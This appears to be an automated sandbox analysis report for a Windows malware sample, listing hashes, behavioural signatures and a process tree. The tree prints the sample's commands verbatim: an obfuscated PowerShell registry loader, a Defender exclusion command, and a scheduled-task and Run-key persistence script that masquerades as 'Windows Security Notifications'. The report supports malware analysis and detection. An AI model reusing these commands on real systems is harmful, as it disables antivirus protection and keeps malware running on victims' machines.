Analysis
-
max time kernel
301s -
max time network
57s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
16/01/2023, 04:17
General
-
Target
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
-
Size
3.8MB
-
MD5
8e9509369f821b09d81b5c3305fba76f
-
SHA1
79717c039c61d8dafa748f62e949eefe9b019c0b
-
SHA256
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944
-
SHA512
517b9377f07f5faf68f684b647cefbdfa0c423ab3842fdd85f4d5abb367fa1abd7bfa6ed7282ce32777cc70049223f298ff713231d9f78bfab06ee1f5d4e5e2a
-
SSDEEP
98304:uGbIlvAq+fTmM2xntJa7IwQBwTDxINNqv4p:1bIlvAnynLW5Qk8
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 57 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {0A3A631D-CD89-4177-96C4-DF4B6D29B786} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+'r'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c73d0caa-5aeb-479f-a4a5-2d57daa96fb1}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe"C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#spcazkzgj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Windows Security Notifications' /tr '''C:\Program Files\WinDefender\SecurityHealthSystray.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WinDefender\SecurityHealthSystray.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Security Notifications' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Notifications" /t REG_SZ /f /d 'C:\Program Files\WinDefender\SecurityHealthSystray.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn "Windows Security Notifications" /tr "'C:\Program Files\WinDefender\SecurityHealthSystray.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zdald#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Windows Security Notifications" } Else { "C:\Program Files\WinDefender\SecurityHealthSystray.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Windows Security Notifications3⤵
-
-
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-126622808-2099810627-861755609-1210976297-9753293491060606787-12348396161924881707"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD570506296200defb7554506de3bf5b0f7
SHA1d27e967ace469f5cf9cae03b23fb42929bd9614f
SHA25665ee148f5a470fbec6555ee1eed964ae2cb6ae7d428b8d320c699d279d9b14bc
SHA51280a5194bb5a18ce3f656e0a6847d4dd14817460a6f1fd0ec8c9f64873957c0e0679afe82f17ddcfb7275594cc526cafa088caa45fad4d5315f9c874c4df6e2c0
-
Filesize
7KB
MD570506296200defb7554506de3bf5b0f7
SHA1d27e967ace469f5cf9cae03b23fb42929bd9614f
SHA25665ee148f5a470fbec6555ee1eed964ae2cb6ae7d428b8d320c699d279d9b14bc
SHA51280a5194bb5a18ce3f656e0a6847d4dd14817460a6f1fd0ec8c9f64873957c0e0679afe82f17ddcfb7275594cc526cafa088caa45fad4d5315f9c874c4df6e2c0
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
10.1MB
-
Filesize
11.4MB
-
Filesize
12KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
1.1MB
-
Filesize
11.4MB
-
Filesize
1.7MB
-
Filesize
1.7MB
-
Filesize
124KB
-
Filesize
12KB
-
Filesize
10.1MB
-
Filesize
12KB
-
Filesize
1.1MB
-
Filesize
1.7MB
-
Filesize
124KB
-
Filesize
11.4MB
-
Filesize
10.1MB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
12KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
8KB
-
Filesize
10.1MB
-
Filesize
11.4MB
-
Filesize
12KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
1.7MB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
1.7MB
-
Filesize
164KB
-
Filesize
156KB
-
Filesize
1.1MB
-
Filesize
1.7MB
-
Filesize
8KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB